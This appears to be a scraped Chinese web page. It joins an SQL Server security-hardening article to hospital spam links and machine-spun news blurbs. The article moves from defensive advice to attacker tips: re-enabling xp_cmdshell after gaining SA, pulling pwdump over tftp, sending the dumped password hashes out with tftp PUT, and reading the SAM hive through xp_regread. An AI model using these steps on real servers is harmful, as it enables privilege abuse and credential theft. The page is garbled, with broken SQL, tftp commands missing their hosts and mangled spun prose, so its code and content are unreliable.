当前位置:首页 >> 季节养生

从到牛

2021-09-06 04:02 来源:密山养生网

SQL Server的安全配置

除跟着微软打满所有补丁外,还需要加强数据库的安全。

首先,你需要加强象sa这样的帐号的密码,跟系统帐号的使用配置相似,一般操作数据库不要使用象sa这样的最高权限的帐号,而使用能满足你的要求的一般帐号。

从前年开始 接着对扩展存储过程开始大屠杀,首先就是xp_cmdshell,还有就是上面那些一大堆存储过程,都drop吧,一般也用不着。

执行:

use master

sp_dropextendedproc ’xp_cmdshell’

去掉guest帐号,阻止非授权用户访问。 去掉不必要的络协议。

加强对数据库登陆的日志记录,最好记录所有登陆事件。可以用下面的简单DOS命令来查看日志:

findstr /C:\"登录\" d:\\Microsoft SQL Server\\MSSQL\\LOG\\*.*

用管理员帐号定期检查所有帐号,是否密码为空或者过于简单,比如下面的语句:

Use master

Select name,Password from syslogins where password is null

用下面语句对所有帐号,检查对存储过程和扩展存储过程的执行权,提防不必要的执行权限扩散:

Use master

Select From sysobjects, sysprotects Where

d = 0 AND xtype IN (’X’,’P’) AND =

加强数据库的安全是非常重要的,有的数据库服务器是和WEB服务器隔离开的,这就同MAIL服务器一样,数据库的日志可能就基本很少去查看,这将会成为管理员的一个疏忽点。类似DNS、MAIL等等,数据库服务器往往成为各种入侵的跳板。

下面是一些关于数据库的问答和技巧:

1、获得SA权限后,却不能执行xp_cmdshell存储过程怎么办?

答:可能是已经把xp_cmdshell等扩展存储过程删除了,可以用这个存储过程把xp_cmdshell恢复。

sp_addextendedproc ’xp_cmdshell’, ’l’

2、通过数据库用pwdump获得系统管理员密码

先上传一个pwdump

tftp -i GET e e

tftp -i GET l l

tftp -i GET e e

pwdump3 127.0.0.1 t

tftp PUT t t

然后再用解密工具l0pht等等破解这些密码。

3、从数据库读取系统管理员密码。

能读出加密的密码是NT的\"administrator\"帐号也不能做的,SQL Server能读出来是使用的LocalSystem帐号,这个帐号比administrator更高一级。可以使用下面这个存储过程。不过读出来的密码是经过加密后的,然后再解密吧。

xp_regread

’HKEY_LOCAL_MACHINE’,’SECURITY\\SAM\\Domains\\Account’,’F’

西安做人流什么医院好最好
乌鲁木齐阴道炎治疗哪家好
昆明白癜风哪家医院好
相关阅读
这些“二胎”高校,发展不比“双一流”差

我们都知道,评判所中学大学生实力如何的方式,一般都是看这所大学生到底“985”、“211”大学生,或者到底“双一流”大学生,但我们以前要参考的这几所法学院,他们虽然既不是“985”、“211”大学生,也不...

索尼爱立信 G11 通过 FCC 认证,配备 5000 万像素后置摄像头

IT之家 5 月 22 日消息,去年 2 月,爆料者 @Roland Quandt 放出了索尼爱立信 G11 和 G21 的官方纹理由此可知,看出 G21 有 50MP 主摄而 G11 未。 现有外媒找到,索尼爱立信 G11 Plus 可能是 HMD 的下一款智能iPad,新时代索尼爱...

别人怎么对你,完全是由这4点决定的,难怪你受制于尊重

很多人就有点,为什么别人要对自己横眉冷眼又或者是恭殷勤敬,但是本来不管别人怎样对你,本来都是根据这4点尽快的,而别人对你的立场,也是离不开这4点的,一切都是让自己倍受珍惜,那就一定要一切都是...

中国电信小数点智能科技分公司正式成立 构建更繁荣的大数据和AI产业生态

5月19日,中国电信数字智能新技术分支机构成立(以下通称“智能新技术分支机构”)。中国电信此次成立智能新技术分支机构,是争做当前技术自主性掌控的新技术型跨国公司的重要举措之一,将加快推动公司大...

vivo Y72t发布:天玑 700 处理器 + 6000mAh大电池,购 1399 元起

IT之家 5 同年 22 日消息,近日,vivo Y72t XFAPP了 vivo 官网,改装成 6000mAh 大电量,主打千元 5G 短航程。 IT之家了解到,vivo Y72t 运用于 6.58 英寸 2408x1080 LCD 冰晶屏,改装成联发科天玑 700 处理器,赞成 5G 和双卡双待。...

与贾乃亮前男友后,金晨又现身李易峰公寓?双方称好友聚会否认恋情

金晨在《母亲们的爱情》中,此前与张继科调情。结果,很差唯有终止。之后,还有与其他男来宾睡觉留言板的机遇。不过,看起来都不是金晨的那杯黄酒。就在这个时候,早就被人推断出金晨与Angelababy同时出现...

友情链接